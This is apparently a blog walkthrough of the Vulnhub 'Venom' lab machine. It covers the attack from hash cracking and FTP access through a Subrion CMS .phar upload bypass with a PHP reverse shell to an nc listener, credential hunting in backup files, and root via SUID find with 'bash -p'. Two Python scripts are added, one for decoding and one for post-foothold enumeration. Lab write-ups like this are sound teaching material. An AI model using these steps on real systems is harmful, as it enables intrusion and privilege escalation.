NepCodeX

Byte Musings: Where Tech Meets Curiosity


Venom Walkthrough – Vulnhub – Writeup


Welcome to another OSCP-like challenge, Venom from Vulnhub. This machine requires a bit of enumeration to get the foothold; otherwise it is an easy machine to do.

Link to the machine: https://www.vulnhub.com/entry/venom-1,701/

Walkthrough of Venom

Identify the target

First, I had to identify the IP address of the target machine on the lab network.

fping -aqg 10.0.2.0/24

Scan open ports

The next step is to check for the open ports on the target machine.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.0.2.37

Enumerate the results

Several ports are open. I started with the Apache web server. It serves the default page, but the page source contains an MD5 hash in a comment.


I pasted the MD5 hash into CrackStation, which returned ‘hostinger’. CrackStation is a lookup of precomputed hashes, so this only works because the hash is unsalted and the input is a common word; it is still worth trying before any brute force.


At that point I had no idea what the word meant, so I searched the internet for it and then enumerated the SMB server.

enum4linux -a 10.0.2.37

It turned out that hostinger is one of the users on the machine, so I tried it as both the username and the password on the FTP server, and luckily that worked.

ftp 10.0.2.37
# log in with username hostinger and password hostinger
ls -al
cd files
ls -al
get hint.txt

The files directory held a hint file, which I downloaded before leaving the FTP session.

cat hint.txt

The hint file gave several pieces of information:

  • There are some base64-encoded messages that I had to decode; this is the easy part.
  • The hostname of the box is venom.box.
  • There is an encoded password that I had to decode.
  • The names hostinger and dora appear again, and at this point I still didn't know what they were for.

So, I started decoding messages.

# three layers of base64 -> "standard vigenere cipher"
echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d
# one layer -> the URL of the online Vigenere tool
echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d

To put all these pieces together, I got the following message.

You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher

After this, I added the hostname venom.box to my hosts file, pointing it at the target's IP.

sudo vi /etc/hosts

The hostname led to a website built on Subrion CMS v4.2.1. The IP address alone only showed the default Apache page: the CMS sits behind a name-based virtual host, so the request has to carry the venom.box hostname.


Searching for exploits for this version turned up an authenticated file upload bypass. Authenticated means it needs valid CMS credentials, so the encoded password from the hint is the next thing to deal with.

https://www.exploit-db.com/exploits/49876

Decoding the password

I opened the link I had decoded. A Vigenère cipher needs a key, so I guessed that one of the two names was the key and the other the username: with hostinger as the key the encoded password decrypted, and dora turned out to be the username.


Using this information, I logged in as the user dora in the CMS.

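The decoding steps from the hint file and the Vigenère decryption of the password, as one added Python example that is not part of the original write-up. peel_base64 strips as many base64 layers as the input actually has (three for the first hint string, one for the second) and stops when the output is no longer valid base64, and vigenere implements the standard letter-only cipher the hint refers to. The two base64 strings are the ones from hint.txt; the encoded password is not reproduced on the page, so the Vigenère round trip uses a constructed sample string, and the assumption that non-letters pass through without consuming key characters is marked in a comment.

```python
import base64
import binascii
import string
from typing import Tuple

# Added example (not the write-up's own code): peel nested base64 layers and
# apply a standard Vigenere cipher, the two steps the hint file asks for.
# The two base64 strings are the ones shown in hint.txt; SAMPLE_PLAINTEXT is a
# constructed value for the round-trip demo (the real encoded password is not
# reproduced on the page, so it is not used here).
HINT_TRIPLE_B64 = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
HINT_URL_B64 = "aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI="
VIGENERE_KEY = "hostinger"            # the key the hint points at
SAMPLE_PLAINTEXT = "Example-Pass 42"  # constructed, not the box's password


def peel_base64(data: str, max_layers: int = 10) -> Tuple[str, int]:
    """Base64-decode repeatedly until the result is no longer valid base64 or
    is not printable text. Returns (plaintext, layers_removed) so the caller
    can tell 'decoded three times' apart from 'was never base64'."""
    current = data.strip()
    layers = 0
    while layers < max_layers:
        try:
            # validate=True rejects any character outside the base64 alphabet
            # (spaces, ':', '-', ...), which is how plaintext stops the loop.
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not decoded or any(ch not in string.printable for ch in decoded):
            break
        current, layers = decoded, layers + 1
    return current, layers


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Standard Vigenere over the Latin alphabet, case preserved.
    Assumption: non-letters are copied through unchanged and do not advance
    the key position. If the online tool handles them differently, a password
    containing digits or symbols will decrypt differently there."""
    if not key or any(k not in string.ascii_letters for k in key):
        raise ValueError("key must be non-empty and alphabetic")
    shifts = [ord(k.lower()) - ord("a") for k in key]
    out = []
    pos = 0  # index into the key, advanced only on letters
    for ch in text:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[pos % len(shifts)]
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    for blob in (HINT_TRIPLE_B64, HINT_URL_B64):
        text, layers = peel_base64(blob)
        print(f"{layers} layer(s) removed: {text}")
    ciphertext = vigenere(SAMPLE_PLAINTEXT, VIGENERE_KEY)
    print("encrypted:", ciphertext)
    print("decrypted:", vigenere(ciphertext, VIGENERE_KEY, decrypt=True))
```

Running the script prints "standard vigenere cipher" after three layers and the cryptii URL after one; feeding the box's encoded password to vigenere with decrypt=True and the key hostinger reproduces the manual step from the online tool.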

Then I tried the exploit, but it didn't work because the author had hardcoded values in the request headers.


So I had two options: edit those values in the exploit code, or find a different way. Since this is a simple file upload vulnerability, I could get the same result by doing the steps manually. The comments in the exploit also link to a GitHub issue:

https://github.com/intelliants/subrion/issues/801

The issue had clear steps for performing the exploit. So I copied a web shell from my Kali install, changed the IP and port inside it to point at my listener, and renamed the extension to .phar. The rename is what bypasses the filter: the upload check blocks .php, but the Apache PHP module configuration on Debian-based systems also maps .phar and .phtml to the PHP handler, so the file still runs as PHP when requested.

cp /usr/share/webshells/php/php-reverse-shell.php shell.phar
# edit shell.phar: set $ip to the attacking machine's address and $port to the listener port

Then, I started listening on the port.

nc -nlvp 4444

Then I uploaded shell.phar through the panel's upload page at /panel/uploads and requested the uploaded file in the browser, which made Apache execute it and connect back to the listener.


Finally, I got a shell, which I upgraded to a proper interactive TTY before going further:

SHELL=/bin/bash script -q /dev/null   # allocate a pseudo-terminal and run bash in it
export TERM=xterm

Getting user’s privileges

The first thing I do after getting access is to look for credentials and for the users on the box. I found the credentials for the MySQL database, but they didn't lead anywhere.

grep bash /etc/passwd   # accounts with a bash login shell

However, I already knew that the user hostinger reuses passwords, so I could try the same password to switch user. There was also a file that held the password:

cd /var/backup.bak
ls -al
cat .backup.txt   # hidden file containing hostinger's password
su hostinger

The next part took me about half a day because I wasn't looking in the right places. After a lot of enumeration, I concluded that the hostinger account wasn't of further use and that I had to find credentials in the CMS files. Eventually I found a file in the CMS backup directory.

cd /var/www/html/subrion/backup/
ls -al
cat .htaccess   # the backup directory's .htaccess held nathan's credentials

Then, I could switch to the user nathan.

su nathan
cd
ls -al
cat user.txt

Root privilege escalation

Then, I looked for SUID binaries on the system.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

find was among them: it is owned by root with the SUID bit set. Because find's -exec runs an arbitrary command, and bash -p keeps the elevated effective UID instead of dropping it, a single invocation gives a root shell. GTFOBins documents this method.

Reference: https://gtfobins.github.io/gtfobins/find/

find . -exec /bin/bash -p \; -quit   # -p keeps the effective UID of 0; -quit stops after the first match

Ultimately, I got the access to the root.
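The two manual searches above (the password left in /var/backup.bak and the CMS backup directory, and the SUID listing that turned up find) as one added Python post-foothold enumeration script. It is not part of the original write-up: the GTFOBins subset, the password-line pattern and the sample web root it builds in a temporary directory are all constructed for the demonstration, and the SUID check is reduced to a pure function of mode and owner so the classification can be exercised without a real set-UID file.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Added example, not the write-up's own code. Two post-foothold checks:
#   1. set-UID binaries owned by root, flagged when the basename is on a
#      GTFOBins subset that gives a shell (GTFO_SUID_SHELLS is illustrative);
#   2. backup files, dotfiles and 'backup' directories under a web root that
#      contain password-like lines (CRED_PATTERN is an assumed heuristic).
GTFO_SUID_SHELLS = {"find", "bash", "vim", "python", "python3", "perl", "env", "awk"}
CRED_PATTERN = re.compile(r"(pass(word|wd)?|pwd|secret)\s*[=:]\s*\S+", re.IGNORECASE)
BACKUP_SUFFIXES = (".bak", ".backup", ".old", "~")
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def mode_is_root_suid(mode: int, uid: int) -> bool:
    """True for a regular file owned by uid 0 with the set-UID bit: what
    'find / -perm -4000' reports, with root ownership also required."""
    return stat.S_ISREG(mode) and uid == 0 and bool(mode & stat.S_ISUID)


def find_suid_binaries(root: str = "/") -> List[Dict[str, object]]:
    """Walk root (skipping pseudo filesystems) and return root-owned SUID
    files, each tagged with whether its name is on the GTFOBins subset."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if any(dirpath == p or dirpath.startswith(p + "/") for p in PSEUDO_FS):
            dirnames[:] = []  # do not descend into /proc, /sys, ...
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink's own mode is never SUID
            except OSError:
                continue
            if mode_is_root_suid(st.st_mode, st.st_uid):
                hits.append({"path": path, "gtfobins": name in GTFO_SUID_SHELLS})
    return sorted(hits, key=lambda h: h["path"])


def find_credential_files(root: str, max_bytes: int = 65536) -> List[Dict[str, object]]:
    """Read small files that look like backups (suffix, dotfile, or a path
    containing 'backup') and return every line matching CRED_PATTERN."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        in_backup_dir = "backup" in dirpath.lower()
        for name in filenames:
            interesting = in_backup_dir or name.startswith(".") or name.lower().endswith(BACKUP_SUFFIXES)
            if not interesting:
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "r", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if CRED_PATTERN.search(line):
                            hits.append({"path": path, "line": lineno, "text": line.strip()})
            except OSError:
                continue
    return sorted(hits, key=lambda h: (h["path"], h["line"]))


def build_demo_tree() -> str:
    """Constructed sample tree (not the box's real files) so the scanner runs
    offline: a web-root backup .htaccess and a /var-style backup dotfile."""
    root = tempfile.mkdtemp(prefix="venom_demo_")
    files = {
        "www/subrion/backup/.htaccess": "Deny from all\n# nathan password: Example_Pass_1\n",
        "www/subrion/index.php": "<?php echo 'password: not a backup, not scanned'; ?>\n",
        "var/backup.bak/.backup.txt": "hostinger\npassword=Example_Pass_2\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in find_credential_files(build_demo_tree()):
        print("credential-like line:", hit)
    for hit in find_suid_binaries("/usr/bin"):
        print("root SUID binary:", hit)
```

On the real box find_suid_binaries("/") would list /usr/bin/find with gtfobins set to True, and find_credential_files("/var") would surface both the .backup.txt line and the .htaccess line that the write-up found by hand; the demo tree only shows the second function's behaviour, including that index.php is skipped because nothing marks it as a backup.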

Conclusion

This is a nice machine for the challenge. I had a feeling early on that I needed to find nathan's credentials, but I didn't follow up on it properly, and that cost me a lot of time. Otherwise, the machine is quite straightforward. Thanks to the authors, Ayush Bawariya and Avnish Kumar, for the machine.


